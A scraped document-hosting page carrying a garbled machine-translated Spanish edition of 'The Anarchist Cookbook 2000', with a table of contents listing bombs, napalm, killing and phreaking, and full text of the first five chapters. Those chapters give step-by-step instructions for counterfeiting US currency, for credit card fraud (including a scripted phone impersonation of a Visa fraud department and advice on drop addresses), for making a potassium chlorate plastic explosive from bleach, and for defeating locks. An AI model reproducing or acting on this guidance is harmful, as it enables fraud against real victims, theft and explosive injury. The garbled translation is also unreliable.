337
ANARQUÍA VERSIÓN LIBRO DE COCINA 2000 Fotos y reformateo de WORD6 por Louis Helm Tabla de contenidos 1. La falsificación de dinero 2. Fraude con tarjetas de crédito 3. Realización de explosivos plásticos 4. La cosecha se traba Maestro 5. El arte de Lockpicking que 6. El arte de Lockpicking II 7. Solidox bombas 8. La venganza de alta tecnología: El Beigebox 9. Las bombas de CO ² 10. La termita II Bombas 11. Explosivos Touch 12. Cartas bomba 13. Bombas de pintura 14. Formas de enviar un coche al INFIERNO 15. ¿Odias a la escuela? 16. Teléfono relacionados con el vandalismo 17. Policía de Carreteras interferencia de radar 18. Las bombas de humo 19. Las bombas de Buzón 20. Hot-cableado coches 21. Napalm 22. Fertilizantes bomba 23. Tenis Bomba Bola 24. Disquete bombas 25. Números de teléfono sin cotización 26. Fusibles 27. Cómo hacer nitrato de potasio 28. Las bombillas que explotan 29. En virtud de encendedores de agua 30. Home-brew cañonazo 31. Química lista de equivalencia 32. Escuchas telefónicas 33. Las minas terrestres 34. Un cóctel de diferentes Molitov 35. Sistemas de Teléfono Tutorial I 36. Sistemas de Teléfono Tutorial II 37. Básico Alianza Teleconferencia 38. Caja de Agua Planes 39. Hindenberg bomba 40. ¿Cómo matar a alguien 41. Sistemas de Teléfono Tutorial III 42. Planes de Black Box 43. La caja de Blotto 44. Cerbatana 45. Brown Box Planes 46. Carburo de calcio bomba 47. Más formas de Enviar un coche al infierno 48. Se arrancaron los equipos de cambio 49. Planes de desactivar la casilla de 50. Listado de Número de la CNA 51. Terrorismo electrónico

106652012 the Anarchy Cookbook 2000 Es

Embed Size (px)

Citation preview

Page 1: 106652012 the Anarchy Cookbook 2000 Es

ANARQUÍA VERSIÓN LIBRO DE COCINA 2000Fotos y reformateo de WORD6 por Louis Helm

Tabla de contenidos1. La falsificación de dinero2. Fraude con tarjetas de crédito3. Realización de explosivos plásticos4. La cosecha se traba Maestro5. El arte de Lockpicking que6. El arte de Lockpicking II7. Solidox bombas8. La venganza de alta tecnología: El Beigebox9. Las bombas de CO ²10. La termita II Bombas11. Explosivos Touch12. Cartas bomba13. Bombas de pintura14. Formas de enviar un coche al INFIERNO15. ¿Odias a la escuela?16. Teléfono relacionados con el vandalismo17. Policía de Carreteras interferencia de radar18. Las bombas de humo19. Las bombas de Buzón20. Hot-cableado coches21. Napalm22. Fertilizantes bomba23. Tenis Bomba Bola24. Disquete bombas25. Números de teléfono sin cotización26. Fusibles27. Cómo hacer nitrato de potasio28. Las bombillas que explotan29. En virtud de encendedores de agua30. Home-brew cañonazo31. Química lista de equivalencia32. Escuchas telefónicas33. Las minas terrestres34. Un cóctel de diferentes Molitov35. Sistemas de Teléfono Tutorial I36. Sistemas de Teléfono Tutorial II37. Básico Alianza Teleconferencia38. Caja de Agua Planes39. Hindenberg bomba40. ¿Cómo matar a alguien41. Sistemas de Teléfono Tutorial III42. Planes de Black Box43. La caja de Blotto44. Cerbatana45. Brown Box Planes46. Carburo de calcio bomba47. Más formas de Enviar un coche al infierno48. Se arrancaron los equipos de cambio49. Planes de desactivar la casilla de50. Listado de Número de la CNA51. Terrorismo electrónico

Page 2: 106652012 the Anarchy Cookbook 2000 Es

52. Iniciar un Conf.. w / o 2600Hz o MF53. Dinamita54. Escape de los automóviles Flame Thrower55. ¿Cómo entrar en BBS expreso56. Bomba de Fuego57. Fusible bomba58. Bomba Genérico59. Los planes de la Caja Verde60. Lanzagranadas portátiles61. Tutorial básico de hacking que62. Tutorial básico de Hacking II63. La piratería de diciembre64. Las bombas inofensivas65. Entrar en Casas66. Hipnotismo67. Remoto Informador Número 168. Jackpotting Cajeros69. Jarra bomba70. Diversión en K-Mart71. Mace Sustituto72. Cómo cultivar marihuana73. Coincidir Bomb Head74. Aterrorizar a McDonalds75. "Mentor'S "Last Words76. El mito del detector de 2600Hz77. Los planes del compartimento azul78. Napalm II79. La nitroglicerina Receta80. Operación: Fuckup81. Robo de llamadas de teléfonos públicos82. Fun Pool83. Envío Gratis84. Explosivos inestables85. Drogas extraños86. El arte de la Cardado87. Reconociendo las tarjetas de crédito88. Cómo obtener una nueva identidad89. Remoto Informador Edición N º 290. Remoto Informador Edición # 391. Remoto Informador Número 492. Remoto Informador Issue # 593. Guía phreaker a Bucle Líneas94. Ma-Bell Tutorial95. Para sacar dinero de teléfonos públicos96. PC basada en PBX97. PC-Pursuit Puerto Estadística98. Caja Perla Planes99. El archivo Phreak100. Planes de Red Box101. RemObS102. Planes de Scarlet Box103. Planes de plata Caja104. Campana Ensuciar105. WATS Agenda de Canadá106. Hacking TRW107. De Hacking en UNIX y VAX108. Circuitos de verificación109. Planes de caja blanca110. La caja de BLAST111. Tratar con el operador de R & R112. Phreaking teléfono celular113. Cheesebox Planes114. Inicio sus propias conferencias

Page 3: 106652012 the Anarchy Cookbook 2000 Es

115. Los planes Gold Box116. La historia de la SEE117. La Lonchera118. Planes de oliva Caja119. La caja de Tron120. Más información del TRW121. "Phreaker de Phunhouse"122. Phrack Magazine-Vol. 3, Número 27123. Phrack Magazine-Vol. 3, Número 27124. Phrack Magazine-Vol. 3, Número 28125. Phrack Magazine-Vol. 3, Número 28126. Phrack Magazine-Vol. 3, Número 28127. Phrack Magazine-Vol. 3, Número 30 128. Phrack Magazine-Vol. 3, Número 30129. Phrack Magazine-Vol. 3, Número 30130. El clorato de sodio131. Mercurio Fulminate132. Polvo Negro improvisado133. Ácido nítrico134. Instrucciones de polvo de bomba135. El carbono-Tet explosivo136. Hacer ácido pícrico de la aspirina137. Recuperación de RDX de C-4138. A base de huevo con gel de Combustibles de la llama139. Pinza Interruptor140. Interruptor de placa flexible141. Firma del sistema de baja [Silenciadores]142. Retardo de encendido del cigarrillo143. Nicotina144. Temporizador de semilla seca145. Clave Granada146. Campana Glosario147. Seguros Teléfono de marcación - Lucha148. Intercambio de escaneo149. Una breve historia de Phreaking150. "Los secretos de la pequeña caja azul"151. La historia de la Phreaking británica152. "Malo como la mierda"153. Telenet154. Follando con el Operador155. Phrack Magazine-Vol. 1, Número 1156. Lista de códigos internacionales de país157. Transmisor de Infinity Planes158. LSD159. Plátanos160. Deliciosas Recetas Marihuana161. Cacahuates162. Botella Química Fuego163. Ignición de los partidos de Reserva164. "Polvo rojo o blanco" Propulsor165. Pipe granada de mano166. Fraude con tarjetas de crédito europeo167. Bomba de potasio168. Sus derechos legales169. Derechos de los delincuentes juveniles170. Abajo el misil carretera171. Diversión con cartuchos de escopeta172. Equipos de vigilancia173. Goteo del temporizador174. Robo175. Misceláneo 176. Afeitarse bomba de crema177. Se arrancaron los cambios de máquinas II

Page 4: 106652012 the Anarchy Cookbook 2000 Es

178. Lockpicking el camino más fácil179. Preludio Anarchy 'N' de explosivos180. Explosivos 'N' Anarchy Vol. 1181. Explosivos 'N' Anarchy Vol. 2182. Explosivos 'N' Anarchy Vol. 3183. Explosivos 'N' Anarchy Vol. 4184. Explosivos 'N' Anarchy Vol. 5185. Explosivos y propelentes186. Lockpicking III187. Química equivalente a la Lista II188. La nitroglicerina II189. De nitrato de celulosa190. Explosivos para principiantes191. Polvo de Flash192. La explosión de plumas193. Las bombas de tubo revisadas194. * SEGURIDAD * LECTURA OBLIGATORIA!195. Triyoduro de amonio196. Ácido sulfúrico y Amm. El nitrato III197. De polvo negro III198. Nitrocelulosa199. RDX200. Los BBS Puerta Negra201. Anfós202. Ácido pícrico II203. Explosivos embotellada204. De hielo seco205. Los fusibles o encendedores o retrasos206. Las bombas de Cine del frasco207. Bombas Libro208. Las bombas de teléfono209. Munición Especial210. Cohetería211. Pipe Cannon II212. Las bombas de humo213. Petardos214. Proveedores II215. Lab-Raid Lista216. Varios anarquía217. Bloquea Combo II218. Varios anarquía II219. La termita IV

1. La falsificación de dinero por el Jolly Roger

Antes de leer este artículo, sería una muy buena idea para obtener un libro en impresión fotográfica offset, porque éste es el método utilizado en la falsificación EE.UU. moneda. Si está familiarizado con este método de impresión, la falsificación debe ser una tarea sencilla para usted.

Page 5: 106652012 the Anarchy Cookbook 2000 Es

La moneda original se hace mediante un proceso llamado "grabado", lo que implica grabar un bloque de metal. Desde el grabado de un bloque metálico es imposible hacerlo a mano, impresión de fotos desplazamiento entra en el proceso.

Impresión de fotografías desplazamiento comienza por hacer negativos de la moneda con una cámara, y poniendo los negativos en un pedazo de material de enmascaramiento (por lo general de color naranja). Los negativos pelados, comúnmente llamados "pisos", se exponen a una placa litográfica con un fabricante de la placa de arco de luz. Las placas están quemados luego se desarrolló con el producto químico adecuado desarrollo. Uno a la vez, estas placas se envuelven alrededor del cilindro de plancha de la prensa.

La prensa a utilizar deberá ser un 11 por 14 offset, tal como el 360 AB Dick. Haga 2 negativos de la parte vertical de la factura, y 1 de la parte de atrás. Después de su desarrollo y dejar que se sequen, llevarlos a una mesa de luz. Usando opaca sobre uno de los lados de retrato, toque a cabo todo el verde, que es el sello y los números de serie. El lado posterior no requiere ningún retoque, porque es todoun color. Ahora, asegúrese de que todos los negativos se registran (alineados correctamente) en las partes planas. Por cierto, cada vez que necesite otro número de serie, disparar una negativa de la parte vertical, corte el número de serie, y eliminar el número de serie anterior de la plana que lo sustituya por uno nuevo.

Ahora usted tiene los 3 pisos, y cada uno representa un color diferente: negro, y 2 tonos de verde (los dos tonos de verde son creados por las tintas de mezcla). Ahora ya está listo para grabar las placas. Tome una placa litográfica y de grabado tres marcas. Estas marcas deberán ser de 2 y 9/16 pulgadas de separación, a partir de uno de los bordes cortos. Haga lo mismo con 2 placas más. Luego, tomar una de las partes planas y lo coloca en la placa, exactamente alineando el borde corto con el borde de la placa. Burn, moverlo hasta la siguiente marca, y cubrir la zona expuesta ya ha grabado. Burn eso, y hacer lo mismo 2 veces más, moviendo el plano hasta una marca más. ¿Es el mismo proceso con los otros 2 pisos (cada uno en un plato aparte). Desarrollar las tres placas. Ahora debe tener 4 imágenes en cada plato con un espacio igual entre cada proyecto de ley.

El documento tendrá que no coinciden exactamente, pero lo hará para la mayoría de las situaciones. El papel a utilizar debe tener un contenido trapo 25%. Por cierto, el papel Disaperf equipo (perforación invisible) hace bien el trabajo. Toma el papel y lo cargan en la prensa. Asegúrese de ajustar el aire, la hebilla, y el espesor de papel adecuado. Comience con la plancha de negro (la placa sin los números de serie). Envuelva alrededor de la tinta negro del cilindro y de la carga in Asegúrese de que ejecuta más de lo necesario, ya que habrá una gran cantidad de rechazos. Entonces, mientras que se está imprimiendo, mezclar las tintas para los números de serie y el lado posterior. Usted tendrá que añadir un poco de blanco y tal vez de color amarillo a la tinta el número de serie. También es necesario agregar negro a la parte de atrás. Experimenta hasta que hacerlo bien. Ahora, limpiar la prensa e imprimir el otro lado. Ahora dispone de un proyecto de ley sin sello verde o números de serie. Imprimir unos pocos con un número de serie, hacer otro y repetir. Siga haciendo esto hasta que tienen diferentes números de tantos como desee. A continuación, corte los proyectos de ley a la medida exacta con un cortador de papel. Usted debería haber impreso una gran cantidad de dinero por ahora, pero todavía hay un problema, el papel es blanco puro. Para teñir, mezcle lo siguiente en una sartén: 2 tazas de agua caliente, 4 bolsitas de té, y alrededor de 16 a 20 gotas de colorante verde (experimentar con esto). Sumerja uno de los proyectos de ley en y compararlo con un auténtico EE.UU. proyecto de ley. Haga los ajustes necesarios, y teñir todas las cuentas. Además, es una buena idea para darles un aspecto usado. Por ejemplo, las arrugas ellos, café frotación muele en ellos, etc

Como se mencionó antes, a menos que usted está familiarizado con la impresión fotográfica offset, la mayor parte de la información en este artículo será bastante difícil de entender. Junto con la obtención de un libro sobre la impresión fotográfica offset, tratar de ver la película "Vivir y morir en Los Ángeles". Se trata de un falsificador, y el productor hace un buen trabajo de mostrar cómo la falsificación. Un buen libro sobre el tema es "El Pobre James Bond".

Page 6: 106652012 the Anarchy Cookbook 2000 Es

Si todo esto parece demasiado complicado para ti, no hay otro método disponible para la falsificación: El color de Canon copiadora láser. La Canon puede replicar CUALQUIER COSA en un color vibrante, incluyendo EE.UU. moneda. Pero, una vez más, el principal problema de la falsificación es el papel utilizado. Por lo tanto, el experimento, y buena suerte!

2. Fraude de tarjetas de The Jolly Roger

Para la mayoría de ustedes por ahí, el dinero es difícil de conseguir. Hasta ahora:

Con la reciente llegada del dinero plástico (tarjetas de crédito), es fácil de usar de otra persona su tarjeta de crédito para ordenar los elementos que siempre han deseado en la vida. Las apuestas son altas, pero la recompensa vale la pena.

Primer paso: Obtener la información de tarjeta de crédito

En primer lugar, debe obtener el elemento crucial: el número de tarjeta de crédito de otra persona. La mejor manera de obtener números de tarjetas de crédito es tomar los carbones azules utilizados en una transacción de tarjeta de crédito en su tienda local. Estos por lo general se pueden encontrar en el cubo de basura al lado del registro, o para los más atrevidos, en el contenedor de basura detrás de la tienda. Pero, debido a la gran cantidad de fraude de tarjetas de crédito, muchas tiendas han optado por utilizar una hoja de transacción de carbón, lo que hace las cosas mucho más difícil. Aquí es donde el teléfono es muy útil.

En primer lugar, buscar a alguien en la guía telefónica, y obtener la mayor información posible sobre ellos. Luego, durante horas de oficina, llame en voz muy convincente -. "Hola, este es Juan Pérez de la tarjeta de crédito Visa Departamento de Investigaciones de Fraude Se nos ha informado de que su tarjeta de crédito pueden haber sido utilizados con fines fraudulentos, por lo que le lea fuera de los números que aparecen en su tarjeta Visa para su verificación. " Por supuesto, usa tu imaginación! Lo creas o no, mucha gente va a caer en este truco y dar a conocer su información de crédito.

Ahora, suponiendo que usted tiene el número de su tarjeta de crédito de la víctima, debe ser capaz de descifrar la información dada.

Paso dos: la información del reconocimiento de copias al carbón

Tarjeta de ejemplo:

[American Express]XXXX XXXXXX XXXXXMM/Y1 THRU MM/Y2JOE shmoe

Explicación:

MM/Y1 es la fecha en que se emitió la tarjeta, y MM/Y2 es la fecha de caducidad. La Tarjeta American Express Gold tiene un número XXXXXX XXXXXXXX XXXXXXXX, y está cubierto hasta por $ 5,000.00, incluso si el titular de la tarjeta está roto.

[Mastercard]5XXX XXXX XXXX XXXXXXXX AAA DD-MM-AA MM / AAJOE shmoe

Explicación:

XXXX en la segunda fila pueden pedir durante el proceso de pedido. La primera fecha es cuando la tarjeta es nueva, y la segunda es cuando la tarjeta expire. La combinación de números más frecuente utilizado es el 5424 1800 XXXX XXXX. Hay muchas de estas tarjetas

Page 7: 106652012 the Anarchy Cookbook 2000 Es

en circulación, pero muchos de ellos están en las listas de buscados, a fin de comprobar esto primero.

[Visa]4XXX XXX (X) XXX (X) XXX (X)MM / AA MM / YY * VISAJOE shmoe

Explicación:

Visa es la tarjeta más abundante, y es aceptada en casi todas partes. El "* VISA" a veces se sustituye con "BWG", o seguido con un código especial. Estos códigos son los siguientes:

[1] MM / YY * VISA V - Tarjeta Preferida [2] MM / YY * VISA CV - Tarjeta Clásica [3] MM / YY * VISA PV - Tarjeta Premier

Tarjetas preferidas están respaldadas con dinero, y son mucho más seguros de usar. Tarjetas Classic son más nuevos, más difíciles de reproducir las tarjetas con el apoyo decente. Tarjetas Premier son las tarjetas Classic con una cobertura de Preferencia. Los números más comunes son 4448 020 XXX XXX, 4254 5123 XXXX 6000 y 4254 5123 XXXX 8500. Cualquier 4712 1250 XXXX XXXX son las tarjetas de crédito Las tarjetas de IBM de la Unión, y son peligrosos de usar, a pesar de que generalmente están cubiertos por las compras grandes.

Paso tres: Prueba de crédito

Ahora debería tener una Visa, Mastercard o American Express Tarjetas de crédito número, con la dirección de la víctima, código postal, y número de teléfono. Por cierto, si usted tiene problemas para obtener la dirección, la mayoría de las compañías telefónicas ofrecen el servicio de rastreo de la dirección, que es un número especial que llame a que le dará una dirección de unnúmero de teléfono, a un costo nominal. Ahora es necesario comprobar el saldo de crédito en la tarjeta de crédito (para asegurarse de que no se quede sin dinero), y también debe asegurarse de que la tarjeta no es robado. Para hacer esto usted debe obtener un número de teléfono que las empresas utilizan para comprobar las tarjetas de crédito en las compras. Si usted va a una tienda por departamentos, ver a la cajera cuando alguien hace una compra con tarjeta de crédito. Él / ella por lo general pueden llamar a un número de teléfono, dar la información de crédito, y luego dar lo que se denomina un "número de comerciante". Estos números son por lo general por escrito en o alrededor de la caja registradora. Es fácil de encontrar ya sea estos números y copiarlos, o esperar hasta que ellos llaman un in Cuidado con lo que llamar y esperar a que el número de comerciante de 8 dígitos (por lo general). Una vez que usted llame al número, con una voz tranquila, leer el número de cuenta, número de comerciante, la cantidad y fecha de caducidad. La agencia de crédito le dirá si está bien, y le dará un número de autorización. Haz de cuenta que está escribiendo este número, y lo repito de nuevo a ellos para comprobarlo. No haga caso de este número por completo, ya que no sirve a ningún propósito real. Sin embargo, una vez que usted hace esto, el banco retira de dólares equivalentes a lo que les dijo, porque la tarjeta se utilizó supuestamente para hacer una compra. A veces se puede engañar al operador diciéndole que el cliente cambió de opinión y decidió no cobrar. Por supuesto, algunos no lo permitirá. Recuerde en todo momento que se supone que es un empleado de la tienda llama a revisar la tarjeta para una compra. El acto como usted está hablando con un cliente cuando él / ella "se cancela".

Cuarto paso: La caída

Una vez que las tarjetas se borran, es necesario encontrar un lugar para tener el paquete enviado. NUNCA use una gota más de una vez. Los siguientes son los sitios típicos de caída:

[1] Una casa vacía

Page 8: 106652012 the Anarchy Cookbook 2000 Es

Una casa vacía hace un excelente lugar para enviar las cosas. Enviar los paquetes de UPS, y dejar una nota en la puerta diciendo: "UPS. Trabajo día, 8 a 6. ¿Podría usted por favor, dejar el paquete en el paso de la puerta trasera?" Usted puede encontrar docenas de casas de un agente de bienes raíces, diciéndoles que desee mirar alrededor para una casa. Pida una lista de veinte casas en venta, y dígales que usted se echa un vistazo a la zona. ¿Es así, hasta que encuentre uno que se adapte a sus necesidades.

[2] Rent A Punto

U-Haul veces alquila espacios en los que pueden tener los paquetes enviados y firmado. Poner fin a su espacio cuando llegue el paquete.

Casas [3] de la gente

Encuentre a alguien que no sabe, y tener el paquete enviado allí. Llame con anticipación diciendo que "llamé a la tienda y se envió el paquete a la dirección equivocada. Fue enviado ya, pero puede que lo guarde allí para mí?" Esta es una manera muy fiable si se mantiene la calma al hablar con la gente.

NO trate de apartados de correos. La mayor parte del tiempo, UPS no entregará a una casilla de correo, y muchas personas se han visto atrapados en el pasado de intentar usar un apartado postal. Además, cuando se haya determinado un sitio de caída, mantener un ojo en ella por personajes sospechosos y los coches que no han estado allí antes.

Quinto paso: Hacer que la transacción

Ahora debe tener un número de tarjeta de crédito confiable con toda la información de facturación es necesario, y un sitio de buena gota.

El mejor lugar para ordenar de catálogos, y es de venta por correo. Es en su mejor interés para realizar la llamada telefónica desde un teléfono público, sobre todo si se trata de un número 1-800. Ahora, cuando usted llame, no trate de disfrazar su voz, pensando que va a engañar al vendedor haciéndole creer que usted es un adulto. Estas personas están entrenados para detectar esto, así que lo mejor es pedir en su propia voz. Se le preguntará lo siguiente: nombre, nombre tal como aparece en la tarjeta, número de teléfono, dirección de facturación, fecha de vencimiento, el método de envío, y el producto. Pregunte si ofrecen el envío de UPS Rojo (llegada día siguiente), porque les da menos tiempo para investigar un pedido. Si está utilizando American Express, es posible que tenga un poco de un problema para el envío una dirección distinta de la dirección de facturación. Además, si el vendedor empieza a hacer preguntas, no cuelgue. Simplemente hablar de su salida de la situación, por lo que no alentará la investigación en el pedido.

Si todo va bien, usted debe tener el producto, de forma gratuita. Seguro paga la cuenta, y no hay nadie más sabio. Tenga cuidado, y tratar de no pedir nada más de $ 500. En algunos estados, UPS requiere una firma para algo más de $ 200, por no hablar de que algo más de $ 200 se define como robo en mayor cuantía, así como el fraude de crédito. Manténgase al tanto haciendo esto, y usted lo muerde un par de años. ¡Buena suerte!

3. Realización de explosivos plásticos de Bleach por el Jolly Roger

El clorato de potasio es un compuesto explosivo extremadamente volátil, y se ha utilizado en el pasado como el relleno de explosivo principal en granadas, minas terrestres y granadas de mortero por países tales como Francia y Alemania. Lejía común contiene una pequeña cantidad de clorato de potasio, que puede ser extraído por el procedimiento que sigue.

En primer lugar, usted debe obtener:

1. Una fuente de calor (plancha caliente, estufa, etc)

Page 9: 106652012 the Anarchy Cookbook 2000 Es

2. Un hidrómetro o densímetro de la batería3. Un gran Pyrex, o un recipiente de acero esmaltado (para pesar los productos

químicos)4. El cloruro de potasio (que se vende como un sustituto de la sal en los almacenes de

la salud y la nutrición)

Tome un galón de blanqueador, póngalo en el recipiente, y comenzar el calentamiento. Si bien esta solución calienta, pese 63 gramos de cloruro de potasio y agregue esto al cloro que se calienta. Compruebe constantemente la solución que se calienta con el aerómetro, y hervir hasta obtener una lectura de 1,3. Si se utiliza un hidrómetro de batería, hierva hasta que haya leído una carga completa.

Tomar la solución y dejar que se enfríe en un refrigerador hasta que se encuentra entre la temperatura ambiente y 0 ° C. Filtra los cristales que se han formado y salvarlos. Hierva esta solución de nuevo y enfriar como antes. Filtrar y guardar los cristales.

Tome los cristales que se han guardado, y mézclelos con agua destilada en las proporciones siguientes: 56 gramos por 100 mililitros de agua destilada. Caliente esta solución hasta que hierva y dejar enfriar. Filtrar la solución y guardar los cristales que se forman por enfriamiento. Este proceso de purificación se llama "cristalización fraccionada". Estos cristales deben ser clorato potásico relativamente puro.

Polvo de éstos a la consistencia de polvos para la cara, y el calor suavemente para eliminar toda la humedad.

Ahora, derrita cinco partes de vaselina con cinco partes de cera. Disuelva esto en gasolina blanca (gasolina estufa de campo), y vierta este líquido en 90 partes de clorato de potasio (los cristales pulverizados procedentes de más arriba) en un recipiente de plástico. Amase este líquido en el clorato de potasio hasta que mezclan íntimamente. Permita que toda la gasolina se evapore.

Finalmente, coloque este explosivo en un lugar fresco y seco. Evitar la fricción, azufre, sulfuros, y compuestos de fósforo. Este explosivo se moldea mejor a la forma deseada y la densidad de 1,3 gramos en un cubo y se sumerge en cera hasta prueba de agua. Estos cargos de tipo bloque garantizan la velocidad más alta detonación. Además, un detonador de al menos un grado 3 debe ser utilizado.

La presencia de los antes mencionados resultados compuestos (sulfuros de azufre, etc) en las mezclas que son o pueden llegar a ser muy sensibles y, posiblemente, se descompone de forma explosiva durante el almacenamiento. Nunca se debe almacenar explosivos de fabricación casera, y se debe utilizar la máxima precaución en todo momento el desempeño de los procesos en esteartículo.

Usted puede obtener un catálogo de otro tema de esta naturaleza por escrito:

Información Publishing Co. Caja 10042 Odessa,Texas 79762

4. La cosecha se traba Maestro por la Jolly Roger

¿Alguna vez ha tratado de impresionar a alguien al decantarse por una de esas cerraduras de combinación y maestros no?

La empresa Master Lock hicieron sus mayores cerraduras de combinación con un régimen de protección. Si usted tira de la palanca demasiado duro, el mando no se enciende. Ese fue su mayor error.

El primer número:

Page 10: 106652012 the Anarchy Cookbook 2000 Es

Salga cualquiera de la Maestría se bloquea para que sepa lo que está pasando. Mientras tira en el cierre (la parte que fuentes abiertas cuando usted consigue el derecho de combinación), gire la perilla hacia la izquierda hasta que no se mueva más, y añadir de cinco a la cantidad que llegue. Ahora tiene el primer número de la combinación.

El segundo número:

Haga girar el dial de alrededor de un par de veces, y luego ir al primer número que tienes. Gire el dial hacia la derecha, pasando por alto el primer número una vez. Cuando te has pasado el primer número, comienza a halar el cierre y girar la perilla. El mando eventualmente caerán en la ranura y bloquear. Mientras que en la ranura, tire de la hebilla y gire la perilla. Si el botón está suelto, vaya a la ranura siguiente, si el mando es dura, tiene el segundo número de la combinación.

El tercer número:

Después de conseguir el segundo número, gira el dial, a continuación, introduzca los dos números. Lentamente girar el dial hacia la derecha, y en cada número, tire de la hebilla. El bloqueo con el tiempo se abrirá si se hizo el proceso correcto.

Este método de apertura de Maestro bloquea sólo funciona en los modelos más antiguos. Alguien informó a maestro de su error, y que emplea un nuevo mecanismo que es a prueba de tontos (por ahora).

5. El arte de Lockpicking I por The Jolly Roger

Lockpicking I: Coches y una variedad de otras cerraduras

Mientras que los temas básicos de la entrada y abrir cerraduras sin ser invitado, no han cambiado mucho en los últimos años, algunos de los dispositivos y técnicas modernas han aparecido en la escena.

Automóviles:

Muchos automóviles más antiguos todavía se pueden abrir con un Slim Jim tipo de apertura (estas y otras técnicas de cerrajería de automóviles están totalmente cubiertos en el libro "En la quietud de la noche", por John Russell III), sin embargo, muchos fabricantes de automóviles han construido los casos sobre el mecanismo de bloqueo, o se ha movido el mecanismo de bloqueo para que el Slim Jim no va a funcionar. Por lo tanto:

América Servicio de CerrajeríaP.O. Caja 26Culver City,California 90230

ELA ofrece una nueva y mejorada Slim Jim que es de 30 pulgadas de largo y 3/4 pulgadas, por lo que tanto alcanzar y deslizarse a través de las tapas de cierre de autos nuevos (en el interior de la puerta). El precio es de $ 5,75 más gastos de envío de $ 2.00 y la manipulación.

Los automóviles fabricados por General Motors siempre han sido una pesadilla para las personas que se necesitan para abrir, porque la unidad de cierre lateral que emplean es muy difícil elegir. Para complicar más las cosas, los nuevos autos de GM emplean escudos de metal para hacer que el uso de un instrumento de tipo Slim Jim muy difícil. Por lo tanto:

Lock Technology Corporation685 Main St.New Rochelle,Nueva York 10.801

LTC ofrece una herramienta muy cuco que facilite la remoción del cilindro de la cerradura sin daño para el vehículo, y le permitirá entrar y / o arrancar el vehículo. El GMC-40 se vende por $ 56.00 más $ 2.00 por gastos de envío.

Page 11: 106652012 the Anarchy Cookbook 2000 Es

El mejor juego de apertura general del automóvil es, probablemente, un conjunto de herramientas de bloqueo que ofrece:

Steck MFG Corporación1319 W. Stewart St.Dayton,OH 45408

Por 29,95 dólares se puede comprar un juego completo de seis herramientas de bloqueo de carbono que se abrirán más de 95% de todos los coches de alrededor.

Cerraduras Kwickset han vuelto muy populares a medida que uno las cerraduras de seguridad de paso para muchos tipos de edificios. Son un poco más difícil de recoger y ofrecer un mayor grado de seguridad que un constructor de cerradura de la puerta normal de instalación. Por lo tanto:

A MFG1151 Wallace St.Massilon,OH 44646

El precio es $ 11.95. Cerraduras Kwickset cómodamente puede desmontarse y se abrió la puerta sin daño a cualquiera de la cerradura o la puerta mediante el Kwick mencionada salida de la herramienta.

Si son demasiado perezosos para abrir cerraduras de automóviles:

Veehof suministroCaja 361Tormenta Lago, IO 50588

VS vende tryout claves para la mayoría de los coches (puesta a punto se utilizan las teclas ya que no hay una clave maestra para cualquier marca de coche, pero hay maestros de grupo de tipo (también conocido como prueba de audición teclas). Los precios promedio de $ 20.00 por juego.

Lockpicking Actualizado:

Durante años, ha habido un número de procedimientos ataque de púa para la mayoría de pasador y sistemas de tumbador de cerradura. En orden inverso al de facilidad son como sigue:

Recolección normal:

El uso de un juego de ganzúas para alinear los pasadores, uno por uno, hasta que la línea de corte se establece y se abre la cerradura.

Trasiego:

Este método utiliza púas que están construidos con una serie de protuberancias o muescas en forma de diamante. Estas selecciones son "rake" (es decir, atropellar a todos los bolos de una sola vez). Con suerte, los pasadores aumentará en la posición abierta y permanecen allí. Rastrillar, si tiene éxito, puede ser mucho menos de un esfuerzo de recolección de serie.

Bloqueo de la pistola de la ayuda:

Este dispositivo fue inventado en forma de pistola de un número de años y ha encontrado aplicación en muchos cerrajeros y personal de seguridad. Básicamente, un pico en forma de aguja se inserta en el hocico de la "pistola" y el "gatillo" se retiró. Esta acción se ajusta la recogida y hacia abajo con fuerza. Si la punta se desliza bajo los pasadores, que también se rompió arriba y hacia abajo fuertemente. Con un poco de suerte se chocan entre sí y por separado en la línea de corte para una fracción de segundo. Cuando esto sucede, la cerradura se abre. La pistola de la ayuda de la

Page 12: 106652012 the Anarchy Cookbook 2000 Es

cerradura no es 100% de éxito, pero cuando lo hace el trabajo, los resultados son muy dramáticos. A veces se puede abrir la cerradura con un broche de presión del gatillo.

Vibrador:

Algunas personas astutas han montado una selección de la aguja en una unidad de cepillo de dientes eléctrico. Este efecto de vibración a veces abrir cerraduras tumbador - al instante.

Ahora hay otro método para abrir las cerraduras pasador y la oblea en un tiempo muy corto. A pesar de que se parece a un cepillo de dientes de selección en apariencia, en realidad es un dispositivo electrónico. Estoy hablando de la selección Cobra que ha sido diseñado y comercializado por:

Fed CorporaciónP.O. Caja 569Scottsdale,AR 85252

La Cobra utiliza dos nueve voltios, cojinetes de teflón (para reducir el ruido), y un rodillo de leva. Viene con tres selecciones (para los diferentes tipos de cerraduras) y funciona tanto en América y en el extranjero, en las cerraduras de pasador o de la oblea. La Cobra se abrirá grupo uno cerraduras (cerraduras de puertas comunes) en tres a siete segundos sin daños, en manos de un cerrajero con experiencia. Puede tardar unos segundos más o hasta medio minuto para alguien sin experiencia en absoluto. También se abrirá el grupo dos cerraduras (incluyendo el gobierno, de alta seguridad, y medicos), aunque esto puede tomar un corto período de tiempo más largo. No se abrirá la barra lateral de GM cerraduras, aunque un dispositivo está a punto de ser introducidos a llenar ese vacío. ¿Cuánto cuesta este juguete que se abrirá la mayoría de los bloqueos en siete segundos?

$ 235,00 más gastos de envío de $ 4.00 y la manipulación.

Para ustedes, galletas básicas de seguridad de disco duro, el FC también vende el MI-6 que se abrirá la mayoría de las cajas de seguridad a un costo de $ 10,000 para el modelo de tres ruedas ataque, y $ 10,500 para el modelo de cuatro ruedas. Se presenta en una de aluminio resistente estuche de transporte con la unidad de disco monitor y el software.

Si ninguna de estas ideas seguro y sano te apetece, siempre puedes recurrir a la lanza térmica magia ...

La lanza térmica es un instrumento más bien crudo construido a partir de 3/8 pulgadas de magnesio varillas huecas. Cada tubo se presenta en una longitud de 10 pies, pero se puede reducir si se desea. Cada uno está roscado en un extremo. Para utilizar la lanza, que el tornillo del tubo, junto con un regulador de mate (como un equipo de soldadura utiliza) y conectar un tanque de oxígeno. A continuación, el oxígeno está encendida y la varilla se enciende con un encendedor de soldadura estándar. El dispositivo produce una increíble cantidad de calor. Se utiliza para cortar bloques de hormigón o incluso rocas. Una lanza activo pasará a través de un pie de acero en unos pocos segundos. La lanza se conoce también como una barra de combustión, y está disponible a partir de:

C.O.L. MFG7748 W. AddisonChicago,Illinois 60634

6. El arte de Lockpicking II de The Jolly Roger

